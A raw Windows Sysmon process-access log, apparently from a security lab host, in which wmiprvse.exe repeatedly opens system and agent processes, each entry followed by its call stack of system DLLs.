15:59:13.320{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022279Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.320{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022278Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.320{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022277Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.320{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022276Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.320{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022275Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.320{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022274Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022273Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022272Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022271Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022270Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022269Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022268Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022267Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022266Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022265Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022264Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022263Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022262Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022261Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022260Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 